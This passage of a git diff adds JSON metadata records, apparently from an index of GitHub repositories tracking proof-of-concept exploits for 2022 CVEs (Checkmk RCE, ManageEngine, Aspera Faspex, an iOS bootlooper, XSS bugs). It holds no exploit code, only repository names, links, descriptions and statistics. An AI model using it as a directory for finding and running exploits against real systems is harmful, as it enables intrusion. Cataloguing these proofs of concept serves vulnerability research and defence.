+++ b/2022/CVE-2022-46623.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 585254938,
+ "name": "CVE-2022-46623",
+ "full_name": "sudoninja-noob\/CVE-2022-46623",
+ "owner": {
+ "login": "sudoninja-noob",
+ "id": 18701598,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18701598?v=4",
+ "html_url": "https:\/\/github.com\/sudoninja-noob"
+ },
+ "html_url": "https:\/\/github.com\/sudoninja-noob\/CVE-2022-46623",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-01-04T17:54:29Z",
+ "updated_at": "2023-01-04T17:54:29Z",
+ "pushed_at": "2023-01-04T17:54:53Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-46689.json b/2022/CVE-2022-46689.json
index 93512b697a..b204095997 100644
--- a/2022/CVE-2022-46689.json
+++ b/2022/CVE-2022-46689.json
@@ -149,6 +149,235 @@
"score": 0,
"subscribers_count": 7
},
+ {
+ "id": 584925426,
+ "name": "NoHomeBar",
+ "full_name": "straight-tamago\/NoHomeBar",
+ "owner": {
+ "login": "straight-tamago",
+ "id": 121408851,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121408851?v=4",
+ "html_url": "https:\/\/github.com\/straight-tamago"
+ },
+ "html_url": "https:\/\/github.com\/straight-tamago\/NoHomeBar",
+ "description": "CVE-2022-46689",
+ "fork": false,
+ "created_at": "2023-01-03T21:46:37Z",
+ "updated_at": "2024-04-03T03:05:15Z",
+ "pushed_at": "2023-01-19T08:04:02Z",
+ "stargazers_count": 65,
+ "watchers_count": 65,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 65,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 585014885,
+ "name": "DockTransparent",
+ "full_name": "straight-tamago\/DockTransparent",
+ "owner": {
+ "login": "straight-tamago",
+ "id": 121408851,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121408851?v=4",
+ "html_url": "https:\/\/github.com\/straight-tamago"
+ },
+ "html_url": "https:\/\/github.com\/straight-tamago\/DockTransparent",
+ "description": "CVE-2022-46689",
+ "fork": false,
+ "created_at": "2023-01-04T05:08:20Z",
+ "updated_at": "2024-06-19T12:48:43Z",
+ "pushed_at": "2023-01-19T08:12:40Z",
+ "stargazers_count": 51,
+ "watchers_count": 51,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 51,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 585711274,
+ "name": "FileSwitcherX",
+ "full_name": "straight-tamago\/FileSwitcherX",
+ "owner": {
+ "login": "straight-tamago",
+ "id": 121408851,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121408851?v=4",
+ "html_url": "https:\/\/github.com\/straight-tamago"
+ },
+ "html_url": "https:\/\/github.com\/straight-tamago\/FileSwitcherX",
+ "description": "CVE-2022-46689",
+ "fork": false,
+ "created_at": "2023-01-05T21:50:25Z",
+ "updated_at": "2024-06-05T17:55:25Z",
+ "pushed_at": "2023-06-13T08:55:50Z",
+ "stargazers_count": 140,
+ "watchers_count": 140,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "ios"
+ ],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 140,
+ "score": 0,
+ "subscribers_count": 12
+ },
+ {
+ "id": 588186913,
+ "name": "Mandela-Legacy",
+ "full_name": "BomberFish\/Mandela-Legacy",
+ "owner": {
+ "login": "BomberFish",
+ "id": 87151697,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87151697?v=4",
+ "html_url": "https:\/\/github.com\/BomberFish"
+ },
+ "html_url": "https:\/\/github.com\/BomberFish\/Mandela-Legacy",
+ "description": "iOS customization app powered by CVE-2022-46689",
+ "fork": false,
+ "created_at": "2023-01-12T14:31:30Z",
+ "updated_at": "2024-05-18T08:16:10Z",
+ "pushed_at": "2023-02-12T01:37:16Z",
+ "stargazers_count": 21,
+ "watchers_count": 21,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2022-46689",
+ "dirtycow",
+ "exploit",
+ "ios",
+ "macdirtycow",
+ "swift",
+ "swiftui",
+ "tweak"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 21,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 592538980,
+ "name": "JailedCement",
+ "full_name": "BomberFish\/JailedCement",
+ "owner": {
+ "login": "BomberFish",
+ "id": 87151697,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87151697?v=4",
+ "html_url": "https:\/\/github.com\/BomberFish"
+ },
+ "html_url": "https:\/\/github.com\/BomberFish\/JailedCement",
+ "description": "Simple iOS bootlooper using CVE-2022-46689.",
+ "fork": false,
+ "created_at": "2023-01-23T23:58:00Z",
+ "updated_at": "2023-03-03T18:05:25Z",
+ "pushed_at": "2023-01-24T18:25:36Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 600600917,
+ "name": "Mandela-Classic",
+ "full_name": "BomberFish\/Mandela-Classic",
+ "owner": {
+ "login": "BomberFish",
+ "id": 87151697,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87151697?v=4",
+ "html_url": "https:\/\/github.com\/BomberFish"
+ },
+ "html_url": "https:\/\/github.com\/BomberFish\/Mandela-Classic",
+ "description": "iOS customization app powered by CVE-2022-46689. No jailbreak required.",
+ "fork": false,
+ "created_at": "2023-02-12T01:33:45Z",
+ "updated_at": "2024-04-26T07:08:07Z",
+ "pushed_at": "2023-02-12T01:33:48Z",
+ "stargazers_count": 16,
+ "watchers_count": 16,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 16,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 608056893,
+ "name": "MacDirtyCow",
+ "full_name": "enty8080\/MacDirtyCow",
+ "owner": {
+ "login": "enty8080",
+ "id": 54115104,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54115104?v=4",
+ "html_url": "https:\/\/github.com\/enty8080"
+ },
+ "html_url": "https:\/\/github.com\/enty8080\/MacDirtyCow",
+ "description": "Example of CVE-2022-46689 aka MacDirtyCow.",
+ "fork": false,
+ "created_at": "2023-03-01T08:23:49Z",
+ "updated_at": "2024-03-24T06:02:34Z",
+ "pushed_at": "2023-03-01T08:25:46Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2022-46689",
+ "exploit",
+ "jailbreak",
+ "macdirtycow",
+ "macos"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 2
+ },
{
"id": 628471421,
"name": "MDC",
@@ -178,5 +407,35 @@
"watchers": 1,
"score": 0,
"subscribers_count": 1
+ },
+ {
+ "id": 634201810,
+ "name": "sw1tch",
+ "full_name": "69camau\/sw1tch",
+ "owner": {
+ "login": "69camau",
+ "id": 131466913,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/131466913?v=4",
+ "html_url": "https:\/\/github.com\/69camau"
+ },
+ "html_url": "https:\/\/github.com\/69camau\/sw1tch",
+ "description": "poc of CVE-2022-46689 written purely in swift",
+ "fork": false,
+ "created_at": "2023-04-29T11:21:40Z",
+ "updated_at": "2023-04-29T11:21:40Z",
+ "pushed_at": "2023-01-11T19:44:48Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
}
]
\ No newline at end of file
diff --git a/2022/CVE-2022-46718.json b/2022/CVE-2022-46718.json
new file mode 100644
index 0000000000..f6e2736705
--- /dev/null
+++ b/2022/CVE-2022-46718.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 635000348,
+ "name": "cve-2022-46718-leaky-location",
+ "full_name": "biscuitehh\/cve-2022-46718-leaky-location",
+ "owner": {
+ "login": "biscuitehh",
+ "id": 507442,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/507442?v=4",
+ "html_url": "https:\/\/github.com\/biscuitehh"
+ },
+ "html_url": "https:\/\/github.com\/biscuitehh\/cve-2022-46718-leaky-location",
+ "description": "CVE-2022-46718: an app may be able to read sensitive location information.",
+ "fork": false,
+ "created_at": "2023-05-01T18:34:52Z",
+ "updated_at": "2024-04-20T08:12:16Z",
+ "pushed_at": "2023-05-01T18:48:34Z",
+ "stargazers_count": 25,
+ "watchers_count": 25,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 25,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-46836.json b/2022/CVE-2022-46836.json
new file mode 100644
index 0000000000..d5bab448c0
--- /dev/null
+++ b/2022/CVE-2022-46836.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 620031715,
+ "name": "CVE-2022-46836_remote_code_execution",
+ "full_name": "JacobEbben\/CVE-2022-46836_remote_code_execution",
+ "owner": {
+ "login": "JacobEbben",
+ "id": 112503338,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112503338?v=4",
+ "html_url": "https:\/\/github.com\/JacobEbben"
+ },
+ "html_url": "https:\/\/github.com\/JacobEbben\/CVE-2022-46836_remote_code_execution",
+ "description": "Authenticated Remote Code Execution by abusing a single quote injection to write to an auth.php file imported by the NagVis component in Checkmk <= 2.1.0p10, Checkmk <= 2.0.0p27, and Checkmk <= 1.6.0p29",
+ "fork": false,
+ "created_at": "2023-03-27T22:30:21Z",
+ "updated_at": "2023-03-28T00:31:50Z",
+ "pushed_at": "2023-03-28T01:41:01Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-47102.json b/2022/CVE-2022-47102.json
new file mode 100644
index 0000000000..b322c71264
--- /dev/null
+++ b/2022/CVE-2022-47102.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 585255498,
+ "name": "CVE-2022-47102",
+ "full_name": "sudoninja-noob\/CVE-2022-47102",
+ "owner": {
+ "login": "sudoninja-noob",
+ "id": 18701598,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18701598?v=4",
+ "html_url": "https:\/\/github.com\/sudoninja-noob"
+ },
+ "html_url": "https:\/\/github.com\/sudoninja-noob\/CVE-2022-47102",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-01-04T17:56:09Z",
+ "updated_at": "2023-01-04T17:56:09Z",
+ "pushed_at": "2023-01-04T17:56:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-47529.json b/2022/CVE-2022-47529.json
new file mode 100644
index 0000000000..df648cd787
--- /dev/null
+++ b/2022/CVE-2022-47529.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 618631888,
+ "name": "CVE-2022-47529",
+ "full_name": "hyp3rlinx\/CVE-2022-47529",
+ "owner": {
+ "login": "hyp3rlinx",
+ "id": 12366009,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12366009?v=4",
+ "html_url": "https:\/\/github.com\/hyp3rlinx"
+ },
+ "html_url": "https:\/\/github.com\/hyp3rlinx\/CVE-2022-47529",
+ "description": "RSA NetWitness Platform EDR Agent \/ Incorrect Access Control - Code Execution",
+ "fork": false,
+ "created_at": "2023-03-24T22:50:26Z",
+ "updated_at": "2023-05-23T11:03:27Z",
+ "pushed_at": "2023-03-24T23:07:40Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-47872.json b/2022/CVE-2022-47872.json
new file mode 100644
index 0000000000..0035c78c90
--- /dev/null
+++ b/2022/CVE-2022-47872.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 595891677,
+ "name": "CVE-2022-47872",
+ "full_name": "Cedric1314\/CVE-2022-47872",
+ "owner": {
+ "login": "Cedric1314",
+ "id": 42855430,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42855430?v=4",
+ "html_url": "https:\/\/github.com\/Cedric1314"
+ },
+ "html_url": "https:\/\/github.com\/Cedric1314\/CVE-2022-47872",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-02-01T02:34:19Z",
+ "updated_at": "2023-02-01T02:34:19Z",
+ "pushed_at": "2023-02-01T03:13:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-47909.json b/2022/CVE-2022-47909.json
new file mode 100644
index 0000000000..09fdef01a7
--- /dev/null
+++ b/2022/CVE-2022-47909.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 619371166,
+ "name": "CVE-2022-47909_unauth_arbitrary_file_deletion",
+ "full_name": "JacobEbben\/CVE-2022-47909_unauth_arbitrary_file_deletion",
+ "owner": {
+ "login": "JacobEbben",
+ "id": 112503338,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112503338?v=4",
+ "html_url": "https:\/\/github.com\/JacobEbben"
+ },
+ "html_url": "https:\/\/github.com\/JacobEbben\/CVE-2022-47909_unauth_arbitrary_file_deletion",
+ "description": "Unauthenticated Arbitrary File Deletion by abusing Livestatus Query Language Injection in Checkmk <= 2.1.0p11, Checkmk <= 2.0.0p28, and all versions of Checkmk 1.6.0 (EOL)",
+ "fork": false,
+ "created_at": "2023-03-27T02:16:51Z",
+ "updated_at": "2023-03-27T09:18:20Z",
+ "pushed_at": "2023-03-27T14:28:26Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-47966.json b/2022/CVE-2022-47966.json
new file mode 100644
index 0000000000..f513378e9e
--- /dev/null
+++ b/2022/CVE-2022-47966.json
@@ -0,0 +1,167 @@
+[
+ {
+ "id": 590196501,
+ "name": "CVE-2022-47966",
+ "full_name": "horizon3ai\/CVE-2022-47966",
+ "owner": {
+ "login": "horizon3ai",
+ "id": 79593994,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4",
+ "html_url": "https:\/\/github.com\/horizon3ai"
+ },
+ "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2022-47966",
+ "description": "POC for CVE-2022-47966 affecting multiple ManageEngine products",
+ "fork": false,
+ "created_at": "2023-01-17T21:26:28Z",
+ "updated_at": "2024-06-05T16:35:56Z",
+ "pushed_at": "2023-01-19T13:10:07Z",
+ "stargazers_count": 123,
+ "watchers_count": 123,
+ "has_discussions": false,
+ "forks_count": 33,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 33,
+ "watchers": 123,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 590861031,
+ "name": "PoC-for-ME-SAML-Vulnerability",
+ "full_name": "shameem-testing\/PoC-for-ME-SAML-Vulnerability",
+ "owner": {
+ "login": "shameem-testing",
+ "id": 83210904,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83210904?v=4",
+ "html_url": "https:\/\/github.com\/shameem-testing"
+ },
+ "html_url": "https:\/\/github.com\/shameem-testing\/PoC-for-ME-SAML-Vulnerability",
+ "description": "PoC for cve-2022-47966",
+ "fork": false,
+ "created_at": "2023-01-19T11:41:05Z",
+ "updated_at": "2023-01-19T11:41:05Z",
+ "pushed_at": "2023-01-19T12:29:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 592261667,
+ "name": "CVE-2022-47966",
+ "full_name": "Inplex-sys\/CVE-2022-47966",
+ "owner": {
+ "login": "Inplex-sys",
+ "id": 69421356,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69421356?v=4",
+ "html_url": "https:\/\/github.com\/Inplex-sys"
+ },
+ "html_url": "https:\/\/github.com\/Inplex-sys\/CVE-2022-47966",
+ "description": "The manage engine mass loader for CVE-2022-47966",
+ "fork": false,
+ "created_at": "2023-01-23T10:45:23Z",
+ "updated_at": "2023-03-11T00:41:31Z",
+ "pushed_at": "2023-01-23T10:46:43Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "command-injection",
+ "cve",
+ "exploit",
+ "loader",
+ "manageengone",
+ "rce",
+ "scanner"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 592277196,
+ "name": "CVE-2022-47966_checker",
+ "full_name": "ACE-Responder\/CVE-2022-47966_checker",
+ "owner": {
+ "login": "ACE-Responder",
+ "id": 123371860,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123371860?v=4",
+ "html_url": "https:\/\/github.com\/ACE-Responder"
+ },
+ "html_url": "https:\/\/github.com\/ACE-Responder\/CVE-2022-47966_checker",
+ "description": "Run on your ManageEngine server",
+ "fork": false,
+ "created_at": "2023-01-23T11:33:29Z",
+ "updated_at": "2024-01-04T14:45:12Z",
+ "pushed_at": "2023-01-23T12:09:00Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 592376575,
+ "name": "CVE-2022-47966-Scan",
+ "full_name": "vonahisec\/CVE-2022-47966-Scan",
+ "owner": {
+ "login": "vonahisec",
+ "id": 31076758,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31076758?v=4",
+ "html_url": "https:\/\/github.com\/vonahisec"
+ },
+ "html_url": "https:\/\/github.com\/vonahisec\/CVE-2022-47966-Scan",
+ "description": "Python scanner for CVE-2022-47966. Supports ~10 of the 24 affected products.",
+ "fork": false,
+ "created_at": "2023-01-23T15:49:10Z",
+ "updated_at": "2024-05-16T11:56:13Z",
+ "pushed_at": "2023-02-08T19:25:50Z",
+ "stargazers_count": 26,
+ "watchers_count": 26,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "blue-team",
+ "pentesting",
+ "python",
+ "red-team",
+ "vulnerability",
+ "vulnerability-scanners"
+ ],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 26,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-47986.json b/2022/CVE-2022-47986.json
new file mode 100644
index 0000000000..b6bf228feb
--- /dev/null
+++ b/2022/CVE-2022-47986.json
@@ -0,0 +1,107 @@
+[
+ {
+ "id": 596890339,
+ "name": "CVE-2022-47986",
+ "full_name": "ohnonoyesyes\/CVE-2022-47986",
+ "owner": {
+ "login": "ohnonoyesyes",
+ "id": 93457304,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93457304?v=4",
+ "html_url": "https:\/\/github.com\/ohnonoyesyes"
+ },
+ "html_url": "https:\/\/github.com\/ohnonoyesyes\/CVE-2022-47986",
+ "description": "Aspera Faspex Pre Auth RCE",
+ "fork": false,
+ "created_at": "2023-02-03T06:32:13Z",
+ "updated_at": "2023-06-21T05:14:03Z",
+ "pushed_at": "2023-02-03T06:33:42Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 600046987,
+ "name": "CVE-2022-47986",
+ "full_name": "dhina016\/CVE-2022-47986",
+ "owner": {
+ "login": "dhina016",
+ "id": 46128375,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46128375?v=4",
+ "html_url": "https:\/\/github.com\/dhina016"
+ },
+ "html_url": "https:\/\/github.com\/dhina016\/CVE-2022-47986",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-02-10T13:16:42Z",
+ "updated_at": "2023-02-10T13:16:42Z",
+ "pushed_at": "2023-02-10T13:17:09Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 611950909,
+ "name": "CVE-2022-47986",
+ "full_name": "mauricelambert\/CVE-2022-47986",
+ "owner": {
+ "login": "mauricelambert",
+ "id": 50479118,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50479118?v=4",
+ "html_url": "https:\/\/github.com\/mauricelambert"
+ },
+ "html_url": "https:\/\/github.com\/mauricelambert\/CVE-2022-47986",
+ "description": "CVE-2022-47986: Python, Ruby, NMAP and Metasploit modules to exploit the vulnerability.",
+ "fork": false,
+ "created_at": "2023-03-09T22:03:48Z",
+ "updated_at": "2023-03-09T22:33:55Z",
+ "pushed_at": "2023-03-09T22:31:44Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "aspera",
+ "cve-2022-47986",
+ "deserialization",
+ "exploit",
+ "faspex",
+ "ibm",
+ "metasploit",
+ "nmap",
+ "poc",
+ "python3",
+ "rce",
+ "ruby",
+ "vulnerability",
+ "yaml"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-48150.json b/2022/CVE-2022-48150.json
new file mode 100644
index 0000000000..e83a8d8080
--- /dev/null
+++ b/2022/CVE-2022-48150.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 624508549,
+ "name": "-CVE-2022-48150",
+ "full_name": "sahilop123\/-CVE-2022-48150",
+ "owner": {
+ "login": "sahilop123",
+ "id": 95895762,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95895762?v=4",
+ "html_url": "https:\/\/github.com\/sahilop123"
+ },
+ "html_url": "https:\/\/github.com\/sahilop123\/-CVE-2022-48150",
+ "description": "I Found the reflected xss vulnerability in shopware 5 .for more details check my poc video ",
+ "fork": false,
+ "created_at": "2023-04-06T16:14:42Z",
+ "updated_at": "2023-12-14T09:35:20Z",
+ "pushed_at": "2023-04-06T19:01:17Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-48197.json b/2022/CVE-2022-48197.json
new file mode 100644
index 0000000000..782f12016c
--- /dev/null
+++ b/2022/CVE-2022-48197.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 584354205,
+ "name": "CVE-2022-48197",
+ "full_name": "ryan412\/CVE-2022-48197",
+ "owner": {
+ "login": "ryan412",
+ "id": 54446262,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54446262?v=4",
+ "html_url": "https:\/\/github.com\/ryan412"
+ },
+ "html_url": "https:\/\/github.com\/ryan412\/CVE-2022-48197",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-01-02T10:27:04Z",
+ "updated_at": "2023-01-02T10:27:04Z",
+ "pushed_at": "2023-01-02T10:31:50Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-48311.json b/2022/CVE-2022-48311.json
new file mode 100644
index 0000000000..42906f93f1
--- /dev/null
+++ b/2022/CVE-2022-48311.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 598664381,
+ "name": "CVE-2022-48311",
+ "full_name": "swzhouu\/CVE-2022-48311",
+ "owner": {
+ "login": "swzhouu",
+ "id": 74352439,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74352439?v=4",
+ "html_url": "https:\/\/github.com\/swzhouu"
+ },
+ "html_url": "https:\/\/github.com\/swzhouu\/CVE-2022-48311",
+ "description": "HP Deskjet 2540 series printer Firmware Version CEP1FN1418BR and Product Model Number A9U23B HTTP configuration page Cross Site Scripting (XSS) Vulnerability",
+ "fork": false,
+ "created_at": "2023-02-07T15:13:33Z",
+ "updated_at": "2023-02-07T15:14:08Z",
+ "pushed_at": "2023-02-07T15:13:55Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-48474.json b/2022/CVE-2022-48474.json
new file mode 100644
index 0000000000..03075cd3f2
--- /dev/null
+++ b/2022/CVE-2022-48474.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 629982721,
+ "name": "CVE-2022-48474_CVE-2022-48475",
+ "full_name": "sapellaniz\/CVE-2022-48474_CVE-2022-48475",
+ "owner": {
+ "login": "sapellaniz",
+ "id": 60947777,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60947777?v=4",
+ "html_url": "https:\/\/github.com\/sapellaniz"
+ },
+ "html_url": "https:\/\/github.com\/sapellaniz\/CVE-2022-48474_CVE-2022-48475",
+ "description": "CVE-2022-48474 &CVE-2022-48475 PoCs & exploits ",
+ "fork": false,
+ "created_at": "2023-04-19T12:27:52Z",
+ "updated_at": "2023-04-19T12:48:29Z",
+ "pushed_at": "2023-04-19T12:50:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
